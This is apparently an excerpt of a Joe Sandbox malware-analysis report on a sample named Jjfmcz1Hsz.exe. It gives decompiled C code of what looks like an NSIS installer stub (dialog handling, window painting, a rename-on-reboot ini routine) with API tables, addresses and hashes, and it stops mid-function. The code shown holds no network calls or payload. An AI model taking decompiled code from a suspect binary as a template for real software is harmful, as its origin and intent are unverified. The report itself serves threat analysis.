                                                                                                                                                                            					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                                                                            					_push(0x23);
                                                                                                                                                                            					E00403EDE(_a4);
                                                                                                                                                                            					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                                            					E00403F00( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                                                                            					_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                            					E00403F13(_t99);
                                                                                                                                                                            					SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                                                                            					_t86 =  *( *0x423710 + 0x68);
                                                                                                                                                                            					if(_t86 < 0) {
                                                                                                                                                                            						_t86 = GetSysColor( ~_t86);
                                                                                                                                                                            					}
                                                                                                                                                                            					SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                                                                            					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                                                                            					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                                                                            					 *0x41ecd4 = 0;
                                                                                                                                                                            					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                                                                            					 *0x41ecd4 = 0;
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}



















                                                                                                                                                                            0x00404037
                                                                                                                                                                            0x00404149
                                                                                                                                                                            0x0040415c
                                                                                                                                                                            0x004041b8
                                                                                                                                                                            0x004041b8
                                                                                                                                                                            0x004041bc
                                                                                                                                                                            0x0040428c
                                                                                                                                                                            0x00404293
                                                                                                                                                                            0x00404295
                                                                                                                                                                            0x00404295
                                                                                                                                                                            0x00404295
                                                                                                                                                                            0x0040429b
                                                                                                                                                                            0x0040429b
                                                                                                                                                                            0x0040429e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004042a5
                                                                                                                                                                            0x004041ca
                                                                                                                                                                            0x004041cc
                                                                                                                                                                            0x004041cf
                                                                                                                                                                            0x004041d6
                                                                                                                                                                            0x004041d8
                                                                                                                                                                            0x004041df
                                                                                                                                                                            0x004041e1
                                                                                                                                                                            0x004041e4
                                                                                                                                                                            0x004041e7
                                                                                                                                                                            0x004041ec
                                                                                                                                                                            0x004041f2
                                                                                                                                                                            0x004041f5
                                                                                                                                                                            0x004041fc
                                                                                                                                                                            0x0040420a
                                                                                                                                                                            0x00404222
                                                                                                                                                                            0x00404235
                                                                                                                                                                            0x00404245
                                                                                                                                                                            0x00404247
                                                                                                                                                                            0x00404247
                                                                                                                                                                            0x004041fc
                                                                                                                                                                            0x004041df
                                                                                                                                                                            0x0040424a
                                                                                                                                                                            0x00404251
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404253
                                                                                                                                                                            0x00404253
                                                                                                                                                                            0x0040425a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040425c
                                                                                                                                                                            0x00404260
                                                                                                                                                                            0x00404271
                                                                                                                                                                            0x00404271
                                                                                                                                                                            0x00404273
                                                                                                                                                                            0x00404277
                                                                                                                                                                            0x00404285
                                                                                                                                                                            0x00404285
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404289
                                                                                                                                                                            0x00404251
                                                                                                                                                                            0x00404164
                                                                                                                                                                            0x00404167
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040416f
                                                                                                                                                                            0x00404175
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404181
                                                                                                                                                                            0x00404184
                                                                                                                                                                            0x00404187
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004041aa
                                                                                                                                                                            0x004041aa
                                                                                                                                                                            0x004041ac
                                                                                                                                                                            0x004041ae
                                                                                                                                                                            0x004041b3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040403d
                                                                                                                                                                            0x0040403d
                                                                                                                                                                            0x00404040
                                                                                                                                                                            0x00404045
                                                                                                                                                                            0x00404047
                                                                                                                                                                            0x00404056
                                                                                                                                                                            0x00404056
                                                                                                                                                                            0x0040405d
                                                                                                                                                                            0x00404060
                                                                                                                                                                            0x00404062
                                                                                                                                                                            0x00404067
                                                                                                                                                                            0x00404070
                                                                                                                                                                            0x00404076
                                                                                                                                                                            0x00404082
                                                                                                                                                                            0x00404085
                                                                                                                                                                            0x0040408e
                                                                                                                                                                            0x00404093
                                                                                                                                                                            0x00404096
                                                                                                                                                                            0x0040409b
                                                                                                                                                                            0x004040b2
                                                                                                                                                                            0x004040b9
                                                                                                                                                                            0x004040cc
                                                                                                                                                                            0x004040cf
                                                                                                                                                                            0x004040e4
                                                                                                                                                                            0x004040eb
                                                                                                                                                                            0x004040f0
                                                                                                                                                                            0x004040f5
                                                                                                                                                                            0x004040f5
                                                                                                                                                                            0x00404104
                                                                                                                                                                            0x00404113
                                                                                                                                                                            0x00404125
                                                                                                                                                                            0x0040412a
                                                                                                                                                                            0x0040413a
                                                                                                                                                                            0x0040413c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404142

                                                                                                                                                                            APIs
                                                                                                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B2
                                                                                                                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 004040C6
                                                                                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040E4
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004040F5
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404104
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404113
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00404116
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404125
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413A
                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040419C
                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 0040419F
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041CA
                                                                                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420A
                                                                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00404219
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404222
                                                                                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404235
                                                                                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404242
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404245
                                                                                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404271
                                                                                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404285
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                            • String ID: Call$N$open$tp
                                                                                                                                                                            • API String ID: 3615053054-805033450
                                                                                                                                                                            • Opcode ID: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
                                                                                                                                                                            • Instruction ID: f5dd8c80699fee66c1c508087d6ededbe7bbcdfb93c9c5870bdb982cd402330a
                                                                                                                                                                            • Opcode Fuzzy Hash: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
                                                                                                                                                                            • Instruction Fuzzy Hash: 1261C5B1A40209BFEB109F61DC45F6A7B79FB84741F10807AFB057A2D1C7B8A951CB98
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                            				struct tagPAINTSTRUCT _v96;
                                                                                                                                                                            				struct HDC__* _t70;
                                                                                                                                                                            				struct HBRUSH__* _t87;
                                                                                                                                                                            				struct HFONT__* _t94;
                                                                                                                                                                            				long _t102;
                                                                                                                                                                            				signed int _t126;
                                                                                                                                                                            				struct HDC__* _t128;
                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                            
                                                                                                                                                                            				if(_a8 == 0xf) {
                                                                                                                                                                            					_t130 =  *0x423710;
                                                                                                                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                                            					_a8 = _t70;
                                                                                                                                                                            					GetClientRect(_a4,  &_v32);
                                                                                                                                                                            					_t126 = _v32.bottom;
                                                                                                                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                                            					while(_v32.top < _t126) {
                                                                                                                                                                            						_a12 = _t126 - _v32.top;
                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                                            						_a16 = _t87;
                                                                                                                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                                            						DeleteObject(_a16);
                                                                                                                                                                            						_v32.top = _v32.top + 4;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                                                                            						_a16 = _t94;
                                                                                                                                                                            						if(_t94 != 0) {
                                                                                                                                                                            							_t128 = _a8;
                                                                                                                                                                            							_v32.left = 0x10;
                                                                                                                                                                            							_v32.top = 8;
                                                                                                                                                                            							SetBkMode(_t128, 1);
                                                                                                                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                                            							DrawTextA(_t128, 0x422f00, 0xffffffff,  &_v32, 0x820);
                                                                                                                                                                            							SelectObject(_t128, _a8);
                                                                                                                                                                            							DeleteObject(_a16);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					EndPaint(_a4,  &_v96);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t102 = _a16;
                                                                                                                                                                            				if(_a8 == 0x46) {
                                                                                                                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x423708;
                                                                                                                                                                            				}
                                                                                                                                                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                                                                            			}













                                                                                                                                                                            0x0040100a
                                                                                                                                                                            0x00401039
                                                                                                                                                                            0x00401047
                                                                                                                                                                            0x0040104d
                                                                                                                                                                            0x00401051
                                                                                                                                                                            0x0040105b
                                                                                                                                                                            0x00401061
                                                                                                                                                                            0x00401064
                                                                                                                                                                            0x004010f3
                                                                                                                                                                            0x00401089
                                                                                                                                                                            0x0040108c
                                                                                                                                                                            0x004010a6
                                                                                                                                                                            0x004010bd
                                                                                                                                                                            0x004010cc
                                                                                                                                                                            0x004010cf
                                                                                                                                                                            0x004010d5
                                                                                                                                                                            0x004010d9
                                                                                                                                                                            0x004010e4
                                                                                                                                                                            0x004010ed
                                                                                                                                                                            0x004010ef
                                                                                                                                                                            0x004010ef
                                                                                                                                                                            0x00401100
                                                                                                                                                                            0x00401105
                                                                                                                                                                            0x0040110d
                                                                                                                                                                            0x00401110
                                                                                                                                                                            0x00401112
                                                                                                                                                                            0x00401118
                                                                                                                                                                            0x0040111f
                                                                                                                                                                            0x00401126
                                                                                                                                                                            0x00401130
                                                                                                                                                                            0x00401142
                                                                                                                                                                            0x00401156
                                                                                                                                                                            0x00401160
                                                                                                                                                                            0x00401165
                                                                                                                                                                            0x00401165
                                                                                                                                                                            0x00401110
                                                                                                                                                                            0x0040116e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00401178
                                                                                                                                                                            0x00401010
                                                                                                                                                                            0x00401013
                                                                                                                                                                            0x00401015
                                                                                                                                                                            0x0040101f
                                                                                                                                                                            0x0040101f
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                            • Opcode ID: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
                                                                                                                                                                            • Instruction ID: a0b7ce50fec83efafeb16569406a1c152c04985fcf8b97c7298fc3655e55bd79
                                                                                                                                                                            • Opcode Fuzzy Hash: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
                                                                                                                                                                            • Instruction Fuzzy Hash: CD419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405A42(void* __ecx) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				long _t13;
                                                                                                                                                                            				long _t25;
                                                                                                                                                                            				char* _t32;
                                                                                                                                                                            				int _t38;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                            				long _t43;
                                                                                                                                                                            				CHAR* _t45;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				void* _t50;
                                                                                                                                                                            				void* _t53;
                                                                                                                                                                            				void* _t54;
                                                                                                                                                                            
                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                            				lstrcpyA(0x421a98, "NUL");
                                                                                                                                                                            				_t45 =  *(_t53 + 0x18);
                                                                                                                                                                            				if(_t45 == 0) {
                                                                                                                                                                            					L3:
                                                                                                                                                                            					_t13 = GetShortPathNameA( *(_t53 + 0x1c), 0x421e98, 0x400);
                                                                                                                                                                            					if(_t13 != 0 && _t13 <= 0x400) {
                                                                                                                                                                            						_t38 = wsprintfA(0x421698, "%s=%s\r\n", 0x421a98, 0x421e98);
                                                                                                                                                                            						_t54 = _t53 + 0x10;
                                                                                                                                                                            						E00405D1B(_t38, 0x421a98, 0x421e98, 0x421e98,  *((intOrPtr*)( *0x423710 + 0x128)));
                                                                                                                                                                            						_t13 = E0040596C(0x421e98, 0xc0000000, 4);
                                                                                                                                                                            						_t49 = _t13;
                                                                                                                                                                            						 *(_t54 + 0x18) = _t49;
                                                                                                                                                                            						if(_t49 != 0xffffffff) {
                                                                                                                                                                            							_t43 = GetFileSize(_t49, 0);
                                                                                                                                                                            							_t6 = _t38 + 0xa; // 0xa
                                                                                                                                                                            							_t47 = GlobalAlloc(0x40, _t43 + _t6);
                                                                                                                                                                            							if(_t47 == 0 || E004059E4(_t49, _t47, _t43) == 0) {
                                                                                                                                                                            								L18:
                                                                                                                                                                            								return CloseHandle(_t49);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(E004058D1(_t39, _t47, "[Rename]\r\n") != 0) {
                                                                                                                                                                            									_t50 = E004058D1(_t39, _t22 + 0xa, 0x4093b0);
                                                                                                                                                                            									if(_t50 == 0) {
                                                                                                                                                                            										_t49 =  *(_t54 + 0x18);
                                                                                                                                                                            										L16:
                                                                                                                                                                            										_t25 = _t43;
                                                                                                                                                                            										L17:
                                                                                                                                                                            										E00405927(_t25 + _t47, 0x421698, _t38);
                                                                                                                                                                            										SetFilePointer(_t49, 0, 0, 0);
                                                                                                                                                                            										E00405A13(_t49, _t47, _t43 + _t38);
                                                                                                                                                                            										GlobalFree(_t47);
                                                                                                                                                                            										goto L18;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t40 = _t47 + _t43;
                                                                                                                                                                            									_t32 = _t40 + _t38;
                                                                                                                                                                            									while(_t40 > _t50) {
                                                                                                                                                                            										 *_t32 =  *_t40;
                                                                                                                                                                            										_t32 = _t32 - 1;
                                                                                                                                                                            										_t40 = _t40 - 1;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t25 = _t50 - _t47 + 1;
                                                                                                                                                                            									_t49 =  *(_t54 + 0x18);
                                                                                                                                                                            									goto L17;
                                                                                                                                                                            								}
                                                                                                                                                                            								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
                                                                                                                                                                            								_t43 = _t43 + 0xa;
                                                                                                                                                                            								goto L16;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					CloseHandle(E0040596C(_t45, 0, 1));
                                                                                                                                                                            					_t13 = GetShortPathNameA(_t45, 0x421a98, 0x400);
                                                                                                                                                                            					if(_t13 != 0 && _t13 <= 0x400) {
                                                                                                                                                                            						goto L3;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t13;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x00405a42
                                                                                                                                                                            0x00405a51
                                                                                                                                                                            0x00405a57
                                                                                                                                                                            0x00405a68
                                                                                                                                                                            0x00405a90
                                                                                                                                                                            0x00405a9b
                                                                                                                                                                            0x00405a9f
                                                                                                                                                                            0x00405abf
                                                                                                                                                                            0x00405ac6
                                                                                                                                                                            0x00405ad0
                                                                                                                                                                            0x00405add
                                                                                                                                                                            0x00405ae2
                                                                                                                                                                            0x00405ae7
                                                                                                                                                                            0x00405aeb
                                                                                                                                                                            0x00405afa
                                                                                                                                                                            0x00405afc
                                                                                                                                                                            0x00405b09
                                                                                                                                                                            0x00405b0d
                                                                                                                                                                            0x00405ba8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405b23
                                                                                                                                                                            0x00405b30
                                                                                                                                                                            0x00405b54
                                                                                                                                                                            0x00405b58
                                                                                                                                                                            0x00405b77
                                                                                                                                                                            0x00405b7b
                                                                                                                                                                            0x00405b7b
                                                                                                                                                                            0x00405b7d
                                                                                                                                                                            0x00405b86
                                                                                                                                                                            0x00405b91
                                                                                                                                                                            0x00405b9c
                                                                                                                                                                            0x00405ba2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ba2
                                                                                                                                                                            0x00405b5a
                                                                                                                                                                            0x00405b5d
                                                                                                                                                                            0x00405b68
                                                                                                                                                                            0x00405b64
                                                                                                                                                                            0x00405b66
                                                                                                                                                                            0x00405b67
                                                                                                                                                                            0x00405b67
                                                                                                                                                                            0x00405b6f
                                                                                                                                                                            0x00405b71
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405b71
                                                                                                                                                                            0x00405b3b
                                                                                                                                                                            0x00405b41
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405b41
                                                                                                                                                                            0x00405b0d
                                                                                                                                                                            0x00405aeb
                                                                                                                                                                            0x00405a6a
                                                                                                                                                                            0x00405a75
                                                                                                                                                                            0x00405a7e
                                                                                                                                                                            0x00405a82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405a82
                                                                                                                                                                            0x00405bb3

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcpyA.KERNEL32(00421A98,NUL,?,00000000,?,00000000,00405BD5,?,?), ref: 00405A51
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BD5,?,?), ref: 00405A75
                                                                                                                                                                            • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405A7E
                                                                                                                                                                              • Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
                                                                                                                                                                              • Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913
                                                                                                                                                                            • GetShortPathNameA.KERNEL32(00421E98,00421E98,00000400), ref: 00405A9B
                                                                                                                                                                            • wsprintfA.USER32 ref: 00405AB9
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405AF4
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B03
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3B
                                                                                                                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B91
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405BA2
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BA9
                                                                                                                                                                              • Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,80000000,00000003), ref: 00405970
                                                                                                                                                                              • Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                            • API String ID: 222337774-4148678300
                                                                                                                                                                            • Opcode ID: 4c27ce9d423c33f638fbced1664b30ba87b14f005f57ce999c1b8a6a2e252c84
                                                                                                                                                                            • Instruction ID: 42b7cc2c3f2f4ef7c3412fd2f3d3cbe4eee66c4c235e50fd6e5efd85f9217fc4
                                                                                                                                                                            • Opcode Fuzzy Hash: 4c27ce9d423c33f638fbced1664b30ba87b14f005f57ce999c1b8a6a2e252c84
                                                                                                                                                                            • Instruction Fuzzy Hash: 9931E271A04B19ABD2206B619C89F6B3A6CDF45755F14003AFE05F62D2DA7CBC008E6D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405F64(CHAR* _a4) {
                                                                                                                                                                            				char _t5;
                                                                                                                                                                            				char _t7;
                                                                                                                                                                            				char* _t15;
                                                                                                                                                                            				char* _t16;
                                                                                                                                                                            				CHAR* _t17;
                                                                                                                                                                            
                                                                                                                                                                            				_t17 = _a4;
                                                                                                                                                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                                                                            					_t17 =  &(_t17[4]);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *_t17 != 0 && E004057D8(_t17) != 0) {
                                                                                                                                                                            					_t17 =  &(_t17[2]);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t5 =  *_t17;
                                                                                                                                                                            				_t15 = _t17;
                                                                                                                                                                            				_t16 = _t17;
                                                                                                                                                                            				if(_t5 != 0) {
                                                                                                                                                                            					do {
                                                                                                                                                                            						if(_t5 > 0x1f &&  *((char*)(E00405796("*?|<>/\":", _t5))) == 0) {
